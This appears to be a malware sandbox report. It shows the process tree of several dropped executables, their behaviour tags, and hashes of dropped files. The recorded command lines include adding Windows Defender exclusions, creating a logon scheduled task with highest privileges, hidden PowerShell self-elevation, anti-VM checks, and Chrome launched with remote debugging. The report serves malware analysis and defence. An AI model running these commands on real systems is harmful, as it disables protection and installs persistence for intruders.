                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1728.3.1255685218\1588342080" -childID 2 -isForBrowser -prefsHandle 2720 -prefMapHandle 2716 -prefsLen 26151 -prefMapSize 233444 -jsInitHandle 800 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {003f594c-96ef-4ef8-ad36-ddfa3b894f4d} 1728 "\\.\pipe\gecko-crash-server-pipe.1728" 2732 d5f658 tab
                                        6⤵
                                          PID:2280
                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1728.4.613843703\427024570" -childID 3 -isForBrowser -prefsHandle 3800 -prefMapHandle 3796 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 800 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {50d2bb6b-1175-46ed-b5ca-4c08a8fc3a4f} 1728 "\\.\pipe\gecko-crash-server-pipe.1728" 3812 1f98f258 tab
                                          6⤵
                                            PID:2644
                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1728.5.207015307\660329867" -childID 4 -isForBrowser -prefsHandle 3944 -prefMapHandle 3948 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 800 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ff569b5d-24a3-4afa-a27d-8340b8afc9f0} 1728 "\\.\pipe\gecko-crash-server-pipe.1728" 3936 1f98fb58 tab
                                            6⤵
                                              PID:912
                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1728.6.487639801\1557148514" -childID 5 -isForBrowser -prefsHandle 4116 -prefMapHandle 4120 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 800 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {85adc38b-12d5-4d31-87b7-87a48110f4b6} 1728 "\\.\pipe\gecko-crash-server-pipe.1728" 4104 1f98fe58 tab
                                              6⤵
                                                PID:944
                                        • C:\Users\Admin\AppData\Local\Temp\10127910101\357210bdae.exe
                                          "C:\Users\Admin\AppData\Local\Temp\10127910101\357210bdae.exe"
                                          3⤵
                                          • Modifies Windows Defender DisableAntiSpyware settings
                                          • Modifies Windows Defender Real-time Protection settings
                                          • Modifies Windows Defender TamperProtection settings
                                          • Modifies Windows Defender notification settings
                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                          • Checks BIOS information in registry
                                          • Executes dropped EXE
                                          • Identifies Wine through registry keys
                                          • Windows security modification
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2396
                                        • C:\Users\Admin\AppData\Local\Temp\10127920101\sqVWjvh.exe
                                          "C:\Users\Admin\AppData\Local\Temp\10127920101\sqVWjvh.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          • System Location Discovery: System Language Discovery
                                          • Checks processor information in registry
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:3212
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                            4⤵
                                            • Uses browser remote debugging
                                            • Enumerates system info in registry
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            • Suspicious use of FindShellTrayWindow
                                            PID:3320
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef51b9758,0x7fef51b9768,0x7fef51b9778
                                              5⤵
                                                PID:3392
                                              • C:\Windows\system32\ctfmon.exe
                                                ctfmon.exe
                                                5⤵
                                                  PID:3496
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1108 --field-trial-handle=1268,i,5332679071003746695,12168415670502501695,131072 /prefetch:2
                                                  5⤵
                                                    PID:3580
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1372 --field-trial-handle=1268,i,5332679071003746695,12168415670502501695,131072 /prefetch:8
                                                    5⤵
                                                      PID:3592
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1592 --field-trial-handle=1268,i,5332679071003746695,12168415670502501695,131072 /prefetch:8
                                                      5⤵
                                                        PID:3636
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2172 --field-trial-handle=1268,i,5332679071003746695,12168415670502501695,131072 /prefetch:1
                                                        5⤵
                                                        • Uses browser remote debugging
                                                        PID:3716
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2188 --field-trial-handle=1268,i,5332679071003746695,12168415670502501695,131072 /prefetch:1
                                                        5⤵
                                                        • Uses browser remote debugging
                                                        PID:3724
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1564 --field-trial-handle=1268,i,5332679071003746695,12168415670502501695,131072 /prefetch:2
                                                        5⤵
                                                          PID:3140
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1492 --field-trial-handle=1268,i,5332679071003746695,12168415670502501695,131072 /prefetch:1
                                                          5⤵
                                                          • Uses browser remote debugging
                                                          PID:1048
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3504 --field-trial-handle=1268,i,5332679071003746695,12168415670502501695,131072 /prefetch:8
                                                          5⤵
                                                            PID:3172
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3624 --field-trial-handle=1268,i,5332679071003746695,12168415670502501695,131072 /prefetch:8
                                                            5⤵
                                                              PID:3560
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3636 --field-trial-handle=1268,i,5332679071003746695,12168415670502501695,131072 /prefetch:8
                                                              5⤵
                                                                PID:4088
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10127931121\skf7iF4.cmd"
                                                            3⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:3092
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -windowstyle hidden -command "Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\10127931121\skf7iF4.cmd' -ArgumentList 'sgcCUaUFtA' -WindowStyle Hidden -Verb RunAs"
                                                              4⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • System Location Discovery: System Language Discovery
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:3284
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10127931121\skf7iF4.cmd" sgcCUaUFtA
                                                                5⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:2220
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell.exe "if ((Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty Model | findstr /i 'WDS100T2B0A') -and (-not (Get-ChildItem -Path F:\ -Recurse | Where-Object { -not $_.PSIsContainer } | Measure-Object).Count)) {exit 900} else {exit 1}"
                                                                  6⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:3772
                                                                  • C:\Windows\SysWOW64\findstr.exe
                                                                    "C:\Windows\system32\findstr.exe" /i WDS100T2B0A
                                                                    7⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:3896
                                                          • C:\Users\Admin\AppData\Local\Temp\10127940101\PQkVDtx.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10127940101\PQkVDtx.exe"
                                                            3⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Drops file in Program Files directory
                                                            • Enumerates system info in registry
                                                            PID:2388
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell.exe -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files\runtime'"
                                                              4⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:620
                                                            • C:\Program Files\runtime\COM Surrogate.exe
                                                              "C:\Program Files\runtime\COM Surrogate.exe"
                                                              4⤵
                                                              • Executes dropped EXE
                                                              PID:3564
                                                          • C:\Users\Admin\AppData\Local\Temp\10127950101\packed.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10127950101\packed.exe"
                                                            3⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Drops file in Program Files directory
                                                            • Enumerates system info in registry
                                                            PID:3220
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell.exe -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files\runtime'"
                                                              4⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:3664
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "COM Surrogate Task" /tr "C:\Program Files\runtime\COM Surrogate.exe" /sc onlogon /rl HIGHEST /f
                                                              4⤵
                                                              • Scheduled Task/Job: Scheduled Task
                                                              PID:1776
                                                            • C:\Program Files\runtime\COM Surrogate.exe
                                                              "C:\Program Files\runtime\COM Surrogate.exe"
                                                              4⤵
                                                              • Executes dropped EXE
                                                              PID:3776
                                                          • C:\Users\Admin\AppData\Local\Temp\10127960101\bncn6rv.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10127960101\bncn6rv.exe"
                                                            3⤵
                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                            • Downloads MZ/PE file
                                                            • Checks BIOS information in registry
                                                            • Executes dropped EXE
                                                            • Identifies Wine through registry keys
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • System Location Discovery: System Language Discovery
                                                            • Checks processor information in registry
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:3856
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                                              4⤵
                                                              • Uses browser remote debugging
                                                              • Enumerates system info in registry
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:3828
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef51b9758,0x7fef51b9768,0x7fef51b9778
                                                                5⤵
                                                                  PID:3216
                                                                • C:\Windows\system32\ctfmon.exe
                                                                  ctfmon.exe
                                                                  5⤵
                                                                    PID:3316
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1148 --field-trial-handle=1188,i,9747478351262096364,2331525272836963796,131072 /prefetch:2
                                                                    5⤵
                                                                      PID:3812
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1464 --field-trial-handle=1188,i,9747478351262096364,2331525272836963796,131072 /prefetch:8
                                                                      5⤵
                                                                        PID:1700
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1628 --field-trial-handle=1188,i,9747478351262096364,2331525272836963796,131072 /prefetch:8
                                                                        5⤵
                                                                          PID:3876
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2216 --field-trial-handle=1188,i,9747478351262096364,2331525272836963796,131072 /prefetch:1
                                                                          5⤵
                                                                          • Uses browser remote debugging
                                                                          PID:3808
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2512 --field-trial-handle=1188,i,9747478351262096364,2331525272836963796,131072 /prefetch:1
                                                                          5⤵
                                                                          • Uses browser remote debugging
                                                                          PID:3428
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2348 --field-trial-handle=1188,i,9747478351262096364,2331525272836963796,131072 /prefetch:1
                                                                          5⤵
                                                                          • Uses browser remote debugging
                                                                          PID:1236
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1164 --field-trial-handle=1188,i,9747478351262096364,2331525272836963796,131072 /prefetch:2
                                                                          5⤵
                                                                            PID:4196
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                                                          4⤵
                                                                          • Uses browser remote debugging
                                                                          PID:4876
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef5069758,0x7fef5069768,0x7fef5069778
                                                                            5⤵
                                                                              PID:4888
                                                                            • C:\Windows\system32\ctfmon.exe
                                                                              ctfmon.exe
                                                                              5⤵
                                                                                PID:4996
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1156 --field-trial-handle=1364,i,17792336523324341924,7734018057676221038,131072 /prefetch:2
                                                                                5⤵
                                                                                  PID:5064
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1524 --field-trial-handle=1364,i,17792336523324341924,7734018057676221038,131072 /prefetch:8
                                                                                  5⤵
                                                                                    PID:5084
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1632 --field-trial-handle=1364,i,17792336523324341924,7734018057676221038,131072 /prefetch:8
                                                                                    5⤵
                                                                                      PID:2220
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2432 --field-trial-handle=1364,i,17792336523324341924,7734018057676221038,131072 /prefetch:1
                                                                                      5⤵
                                                                                      • Uses browser remote debugging
                                                                                      PID:3672
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2684 --field-trial-handle=1364,i,17792336523324341924,7734018057676221038,131072 /prefetch:1
                                                                                      5⤵
                                                                                      • Uses browser remote debugging
                                                                                      PID:4112
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2700 --field-trial-handle=1364,i,17792336523324341924,7734018057676221038,131072 /prefetch:1
                                                                                      5⤵
                                                                                      • Uses browser remote debugging
                                                                                      PID:4120
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1480 --field-trial-handle=1364,i,17792336523324341924,7734018057676221038,131072 /prefetch:2
                                                                                      5⤵
                                                                                        PID:4648
                                                                                  • C:\Users\Admin\AppData\Local\Temp\10127970101\mAtJWNv.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\10127970101\mAtJWNv.exe"
                                                                                    3⤵
                                                                                      PID:4428
                                                                                      • C:\Users\Admin\AppData\Local\Temp\10127970101\mAtJWNv.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\10127970101\mAtJWNv.exe"
                                                                                        4⤵
                                                                                          PID:4472
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4428 -s 500
                                                                                          4⤵
                                                                                          • Program crash
                                                                                          PID:4556
                                                                                      • C:\Users\Admin\AppData\Local\Temp\10127980101\HmngBpR.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\10127980101\HmngBpR.exe"
                                                                                        3⤵
                                                                                          PID:3696
                                                                                          • C:\Users\Admin\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe
                                                                                            4⤵
                                                                                              PID:2900
                                                                                              • C:\Users\Admin\AppData\Roaming\Dockerprotectysd\SplashWin.exe
                                                                                                C:\Users\Admin\AppData\Roaming\Dockerprotectysd\SplashWin.exe
                                                                                                5⤵
                                                                                                  PID:3888
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    C:\Windows\SysWOW64\cmd.exe
                                                                                                    6⤵
                                                                                                      PID:2840
                                                                                              • C:\Users\Admin\AppData\Local\Temp\10127990101\FvbuInU.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\10127990101\FvbuInU.exe"
                                                                                                3⤵
                                                                                                  PID:4004
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4004 -s 1196
                                                                                                    4⤵
                                                                                                    • Program crash
                                                                                                    PID:2064
                                                                                            • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                                                                              1⤵
                                                                                                PID:332
                                                                                              • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                                                                                1⤵
                                                                                                  PID:3848
                                                                                                • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                                                                                  1⤵
                                                                                                    PID:1680
                                                                                                  • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                                                                                    1⤵
                                                                                                      PID:4188

                                                                                                    Network

                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                    Replay Monitor

                                                                                                    Loading Replay Monitor...

                                                                                                    Downloads

                                                                                                    • C:\ProgramData\FHJDAAEG

                                                                                                      Filesize

                                                                                                      92KB

                                                                                                      MD5

                                                                                                      0040f587d31c3c0be57da029997f9978

                                                                                                      SHA1

                                                                                                      d4729f8ed094797bd54ea8a9987aaa7058e7eaa2

                                                                                                      SHA256

                                                                                                      a285e3bc24d218869afd114c236f0aafebeba96d4105ddd379ae31f03b26079b

                                                                                                      SHA512

                                                                                                      3e4ffca2ff979b5f91a0c8d5d1fa52f0ab47ff63e50b1cc5e7708c4ba8359ee8505a9259f329da5733048e953f0778af73ce76735b481d558dd05a2cb45a5977

                                                                                                    • C:\ProgramData\GCFCFCGCGIEHIECAFCFI

                                                                                                      Filesize

                                                                                                      6KB

                                                                                                      MD5

                                                                                                      64f673309b5eac7465a98e7db27249cd

                                                                                                      SHA1

                                                                                                      8219f7e7c35fd3bac640d260cda3682be595f1d6

                                                                                                      SHA256

                                                                                                      ce4f1d5e5da443bad0b80b5cb9499262411818e2c04f6270428c39cddcd41a12

                                                                                                      SHA512

                                                                                                      f35e1530b715caadc58f89311c8b41a03118833847a9270f3ca0e349467a32b6f4728e44514f53b755e36455e759ebd40273bd67a4d1b4ade42212dfebeaa8f2

                                                                                                    • C:\ProgramData\JJDGCGHCGHCBFHJJKKJE

                                                                                                      Filesize

                                                                                                      46KB

                                                                                                      MD5

                                                                                                      02d2c46697e3714e49f46b680b9a6b83

                                                                                                      SHA1

                                                                                                      84f98b56d49f01e9b6b76a4e21accf64fd319140

                                                                                                      SHA256

                                                                                                      522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

                                                                                                      SHA512

                                                                                                      60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

                                                                                                    • C:\Temp\7hQVsHDKN.hta

                                                                                                      Filesize

                                                                                                      779B

                                                                                                      MD5

                                                                                                      39c8cd50176057af3728802964f92d49

                                                                                                      SHA1

                                                                                                      68fc10a10997d7ad00142fc0de393fe3500c8017

                                                                                                      SHA256

                                                                                                      f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84

                                                                                                      SHA512

                                                                                                      cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6

                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

                                                                                                      Filesize

                                                                                                      71KB

                                                                                                      MD5

                                                                                                      83142242e97b8953c386f988aa694e4a

                                                                                                      SHA1

                                                                                                      833ed12fc15b356136dcdd27c61a50f59c5c7d50

                                                                                                      SHA256

                                                                                                      d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755

                                                                                                      SHA512

                                                                                                      bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

